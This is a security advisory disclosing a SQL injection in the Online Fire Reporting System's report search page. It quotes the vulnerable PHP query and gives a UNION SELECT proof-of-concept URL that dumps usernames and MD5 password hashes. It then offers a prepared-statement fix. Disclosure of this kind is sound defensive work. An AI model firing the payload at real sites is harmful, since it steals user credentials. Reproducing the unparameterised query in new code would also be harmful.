SQL Injection - Online Fire Reporting System

May 21, 2022

Product: Online Fire Reporting System
Product Link: Link
Vulnerability: SQL Injection
Severity: Critical

Overview

SQL Injection is an attack in which an attacker injects their own SQL into a query the application builds from user input. This can allow the attacker to read arbitrary data from the database.

The vulnerability is caused by a non-parameterised query used to fetch search results on the report search page, in the /report/list.php file.

<?php
if(isset($_GET['search'])):
    $i = 1;
    // $_GET['search'] is interpolated straight into the SQL string (three times) with no escaping or binding
    $qry = $conn->query("SELECT * from `request_list` where (fullname LIKE '%{$_GET['search']}%' or contact LIKE '%{$_GET['search']}%' or code LIKE '%{$_GET['search']}%') order by abs(unix_timestamp(date_created)) desc ");
    while($row = $qry->fetch_assoc()):
?>

Because the search parameter supplied by the user is neither sanitised nor parameterised, a user can close the string literal, append their own query, and terminate it with a semicolon and a SQL comment. The remainder of the original query is discarded, leaving the attacker in control of what data is returned.

This can be used to exfiltrate the usernames and passwords of all users on the platform. As the passwords are stored as unsalted MD5 hashes, they would be very easy to crack by brute force.

PoC URL:

http://localhost/?p=report/list&search=a%27)%20UNION%20SELECT%20null,%20null,username,password,%20null,%20null,%20null,%20null,%20null,%20null%20FROM%20users;%20--%20-

[Screenshot: Usernames and passwords dumped through SQL injection]

Remediation

The application should use parameterised (prepared) queries so that user input is bound to the statement as data rather than concatenated into the SQL string, which prevents it from altering the query structure.
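As an added example (not the project's own code), the report search from /report/list.php rewritten with a mysqli prepared statement; it assumes $conn is the application's existing mysqli connection and that the mysqlnd driver is available for get_result().

```php
<?php
// Added example, not code from the Online Fire Reporting System.
// Assumes $conn is the application's existing mysqli connection.

function search_reports(mysqli $conn, string $search): array
{
    // Escape LIKE metacharacters so a user typing '%' or '_' cannot widen
    // the match. MySQL's default LIKE escape character is the backslash.
    $pattern = '%' . addcslashes($search, '\\%_') . '%';

    // Placeholders (?) stand in for the three search terms; the query text
    // is fixed before any user data is involved.
    $sql = "SELECT * FROM `request_list`
            WHERE (fullname LIKE ? OR contact LIKE ? OR code LIKE ?)
            ORDER BY ABS(UNIX_TIMESTAMP(date_created)) DESC";

    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }

    // The pattern is sent to the server as a string parameter, so quotes,
    // ')' or '-- ' inside it are matched literally and never parsed as SQL.
    $stmt->bind_param('sss', $pattern, $pattern, $pattern);
    $stmt->execute();

    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage in the template, replacing the interpolated $conn->query() call:
if (isset($_GET['search'])) {
    $i = 1;
    foreach (search_reports($conn, (string) $_GET['search']) as $row) {
        // render $row as before
        $i++;
    }
}
```

Since the page notes that passwords are stored as unsalted MD5, storing them with password_hash() and checking them with password_verify() would also remove the easy-crack condition described above.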